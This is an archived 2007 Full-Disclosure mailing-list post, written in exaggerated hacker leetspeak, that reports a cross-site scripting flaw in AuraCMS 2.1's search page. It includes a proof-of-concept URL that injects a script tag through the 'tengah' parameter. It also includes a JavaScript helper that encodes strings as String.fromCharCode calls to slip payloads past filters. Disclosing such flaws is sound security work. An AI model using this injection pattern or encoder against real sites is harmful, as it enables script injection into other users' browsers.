[Full-disclosure] 0day0day0day0day AURACMS XSS!! LATEST VERSION!!! 0day0day0day0day

2007-11-14T00:00:00
ID SECURITYVULNS:DOC:18412
Type securityvulns
Reporter Securityvulns
Modified 2007-11-14T00:00:00

Description

0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day 0day0day0day0day 0day0day0day0day!!!!!!!!!!!!!!!!!!!!! BROUGHT 2 U BY UlTRa HAQRS 4 AL7 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 0day0day0day0dayTITle!!:::::::::::::AURA CMS 2.1 XSS(cr0ss siTE SCRipt1ng!!!!) 0day0day0day0dayBY!!::::::::::::::::HAQ MASt4r!!! 0day0day0day0dayREQUIRE!!:::::::::Wind0zeeee s3rv3r & r3gister_gl0bals on!!!!! 0day0day0day0dayXPL0iT!!::::::::::::http://localhost/audit/auracms/content/search.PHP?tengah=%3Cscript%3Ealert(String.fromCharCode(85,108,84,82,97,32,72,65,81,82,83,32,52,32,65,76,55,32,115,116,49,108,108,32,114,117,108,51,32,116,101,104,32,115,99,51,110,101,33,33,33,33));%3C/script%3E<!-- 0day0day0day0day 0day0day0day0day 0day0day0day0day!!!!!!!!!!!!!!!!!!!!! OMGzz, l33t functi0n discl0sure !!!!!!!!!!!!!!!!!!!!! 0day0day0day0day cr3ate m4d XSS 0dayz w. th15 0day0day0day0day ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 0day0day0day0day function toCharCode(string){ var char="String.fromCharCode("; for(var idx = 0; idx < string.length; idx++) { char += string.charCodeAt(idx) + (idx == string.length-1 ? "" : ","); } return char+");"; } 0day0day0day0day ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 0day0day0day0day 0day0day0day0day 0day0day0day0day!!!!!!!!!!!!!!!!!!!!! M4d Pr0Ps 2 aL7 UH4A m3mbers - w3 rule da sc3n3 !!!!!!!!!!!!!!!!!!!!! 0day0day0day0day 0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day0day


Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/